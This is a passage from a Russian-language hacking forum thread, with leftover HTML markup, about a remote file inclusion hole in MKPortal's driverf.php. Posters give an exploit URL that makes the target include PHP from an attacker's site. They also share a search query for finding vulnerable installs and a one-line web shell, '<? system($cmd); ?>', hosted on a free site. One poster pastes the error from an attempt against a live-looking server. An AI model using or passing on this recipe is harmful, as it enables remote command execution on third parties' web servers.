внимание! в 1.0.1а это уже исправили файл http://[target]/mkportal/include/driverf.php содержит что-то вроде </span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE">require $MK_PATH."/conf_global.php";[/QUOTE]<span id='postcolor'> эксплойт: http://[target]/mkporta....TH=http где: http://[hacker_site]/conf_global.php любой php код http://www.google.ru/search?....%BA&lr=
пхп-шная инъекция ? Довольно частый случай: http://www.site.ru/index.php&se=сайт_с_кодом&cmd=Команды
Хотелось бы добавить, что "сайтом с кодом" может являться любой сайт на народе со страничкой следующего содержания: </span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE"> <PRE> <H4> <? system($cmd); ?> </H4> </PRE> [/QUOTE]<span id='postcolor'> Н-р: http://www.shutnicok.narod.ru/xak.php
кстати как видно из запроса в google этот движок неплохо распостранился интересно сколько на народе вот таких сайтов с загадочными файлами *.php =)
Блин, пишет вот что: </span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата </td></tr><tr><td id="QUOTE">Fatal error: main(): Failed opening required 'http://hack-user.narod.ru/conf_global.php' (include_path='.:') in /membri/galassia/mkportal/include/driverf.php on line 20[/QUOTE]<span id='postcolor'>